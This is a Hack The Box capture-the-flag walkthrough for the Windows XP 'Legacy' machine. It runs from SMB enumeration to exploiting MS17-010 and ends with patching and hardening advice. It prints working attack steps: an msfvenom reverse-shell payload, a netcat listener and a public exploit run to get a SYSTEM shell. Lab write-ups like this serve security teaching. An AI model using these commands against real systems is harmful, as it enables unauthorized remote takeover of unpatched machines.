Legacy - HTB Easy Machine - English
OS
Windows
Difficulty
Easy
User Owns
42.6K
Root Owns
43.6K
Rating
4.6/5
Release
2017/03/15
Creator
ch4p
First Blood User
0x1Nj3cT0R
First Blood Root
0x1Nj3cT0R
User Rated Difficulty
About
Legacy is a fairly straightforward beginner-level machine which demonstrates the potential security risks of SMB on Windows. Only one publicly available exploit is required to obtain administrator access.
Exploitation
Enumeration
Starting with a nmap enumeration we can see its a windows machine running only smb server.
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
4095/tcp closed xtgui
7518/tcp closed unknown
10253/tcp closed eapol-relay
11257/tcp closed unknown
13767/tcp closed unknown
30522/tcp closed unknown
41588/tcp closed unknown
42743/tcp closed unknown
43244/tcp closed unknown
44251/tcp closed unknown
54772/tcp closed unknown
55622/tcp closed unknown
56234/tcp closed unknown
57817/tcp closed unknown
58519/tcp closed unknown
60227/tcp closed unknown
62123/tcp closed unknown
65121/tcp closed unknown
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:bb:25 (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2025-09-04T20:04:40+03:00 Lets start with netexec enumeration and see if we find something, but without a user or pass, we get nothing.
legacy
└─ $ nxc smb 10.10.10.4 -u '' -p '' --shares
SMB 10.10.10.4 445 LEGACY [*] Windows 5.1 x32 (name:LEGACY) (domain:legacy) (signing:False)
(SMBv1:True) (Null Auth:True)
SMB 10.10.10.4 445 LEGACY [+] legacy\:
SMB 10.10.10.4 445 LEGACY [-] Error enumerating shares: STATUS_ACCESS_DENIEDI like to run enum4linux-ng for some smb shares because we can get some information about the service sometimes, but we also got nothing.
enum4linux-ng 10.10.10.4 -A -C
ENUM4LINUX - next generation (v1.3.5)
==========================
| Target Information |
==========================
[*] Target ........... 10.10.10.4
[*] Username ......... ''
[*] Random Username .. 'hbuecrxe'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
===================================
| Listener Scan on 10.10.10.4 |
===================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=========================================================
| NetBIOS Names and Workgroup/Domain for 10.10.10.4 |
=========================================================
[+] Got domain/workgroup name: HTB
[+] Full NetBIOS names information:
- LEGACY <00> - B <ACTIVE> Workstation Service
- HTB <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
- LEGACY <20> - B <ACTIVE> File Server Service
- HTB <1e> - <GROUP> B <ACTIVE> Browser Service Elections
- HTB <1d> - B <ACTIVE> Master Browser
- ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
- MAC Address = 00-50-56-94-BB-25
=======================================
| SMB Dialect Check on 10.10.10.4 |
=======================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.0.2: false
SMB 2.1: false
SMB 3.0: false
SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[*] Enforcing legacy SMBv1 for further enumeration
=========================================================
| Domain Information via SMB session for 10.10.10.4 |
=========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: LEGACY
NetBIOS domain name: ''
DNS domain: legacy
FQDN: legacy
Derived membership: workgroup member
Derived domain: unknown
=======================================
| RPC Session Check on 10.10.10.4 |
=======================================
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''
[*] Check for guest access
[-] Could not establish guest session: STATUS_LOGON_FAILURE
=================================================
| Domain Information via RPC for 10.10.10.4 |
=================================================
[-] Could not get domain information via 'lsaquery': STATUS_ACCESS_DENIED
=============================================
| OS Information via RPC for 10.10.10.4 |
=============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 5.1
OS version: '5.1'
OS release: not supported
OS build: not supported
Native OS: Windows 5.1
Native LAN manager: Windows 2000 LAN Manager
Platform id: null
Server type: null
Server type string: null
===================================
| Users via RPC on 10.10.10.4 |
===================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
====================================
| Groups via RPC on 10.10.10.4 |
====================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
======================================
| Services via RPC on 10.10.10.4 |
======================================
[-] Could not parse result of 'net rpc service list' command, please open a GitHub issue
====================================
| Shares via RPC on 10.10.10.4 |
====================================
[-] Could not list shares: timed out
=======================================
| Policies via RPC for 10.10.10.4 |
=======================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
=======================================
| Printers via RPC for 10.10.10.4 |
=======================================
[+] No printers returned (this is not an error)
Completed after 60.90 secondssmb-vuln-ms17-010
Knowing its a windows machine, I tried run the nmap script to see if we get any vulnerability or hint about the machine. Luckily we got all information about the smb-vuln-ms17-010 vulnerability and it's CVE.
nmap --script smb-vuln* -p 445 10.10.10.4
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-30 12:55 -0300
Failed to resolve " ".
Nmap scan report for 10.10.10.4
Host is up (0.34s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SM
Bv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance
-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 12.56 secondsFoothold
To explore this vulnerability I found a very good python script that can get a remote code execution from our terminal. It's still using python2, so we gonna have to follow the docker method.
First let's make the payload with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=9001 -f exe -o ms17-010.exeStart our listener
nc -lvnp 9001I personally use archlinux, and already have Docker installed on my machine, so you need to install it using the recommend method for your linux distro.
Then we can follow the repository steps
mkdir exploit
cd exploit
touch Dockerfile
echo "impacket==0.9.23" > requirements.txtWrite the Dockerfile:
FROM python:2.7-alpine
RUN apk --update --no-cache add \
git \
zlib-dev \
musl-dev \
libc-dev \
gcc \
libffi-dev \
openssl-dev && \
rm -rf /var/cache/apk/*
RUN mkdir -p /opt/exploit
COPY requirements.txt /opt/exploit
COPY ms17-010.exe /opt/exploit
WORKDIR /opt/exploit
RUN pip install -r requirements.txtBuild the Docker Container:
sudo docker build -t exploit .Run the Container:
sudo docker run -it exploit /bin/shDownloading and Running the Exploit:
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.gitcd MS17-010_CVE-2017-0143python send_and_execute.py 10.10.10.4 ../ms17-010.exeRunning the exploit will give us the remote shell
└─ $ nc -lvnp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.10.4 1034
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>With that we can get both flags running as NT AUTHORITY\SYSTEM
User
C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4....Root
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d25....This machine used to be vulnerable to smb-vuln-ms08-067 from CVE-2008-4250 when I first solve times ago, but at the time I write this walkthrough I could only exploit with the smb-vuln-ms17-010 vulnerability.
How to prevent it
The most effective way to avoid exploitation of MS17-010 (EternalBlue) is to always apply Microsoft’s security patches. In this specific case, the vulnerability was fixed in the MS17-010 security bulletin, released in March 2017. Running outdated systems like Windows XP represents a critical security risk since it no longer receives official support.
Recommended actions:
- Apply security updates – Always keep Windows up to date and apply Microsoft’s patches. For legacy systems, seriously consider replacing them with supported versions.
- Disable SMBv1 – This protocol is obsolete and insecure, and should be disabled across all environments.
- Restrict access – Never expose SMB services to the internet. Allow access only from trusted internal networks through firewall rules or network ACLs.
- Network segmentation – Isolate legacy systems into restricted VLANs with minimal access to the rest of the infrastructure.
- Monitoring and response – Enable logging and monitor SMB traffic for suspicious activity. Use IDS/IPS solutions to detect known exploitation attempts.
- Plan for migration – If legacy systems (like Windows XP) are strictly required due to old software, plan their migration to modern environments or keep them isolated with no exposure to critical networks.
In short, the attack was only possible because the system was outdated, running SMBv1, and unpatched. Following patch management best practices and disabling insecure protocols would have completely prevented the exploitation.
References
The master 0xdf
MS17-010_CVE-2017-0143
OpenCVE CVE-2017-0143
NIST CVE-2017-0143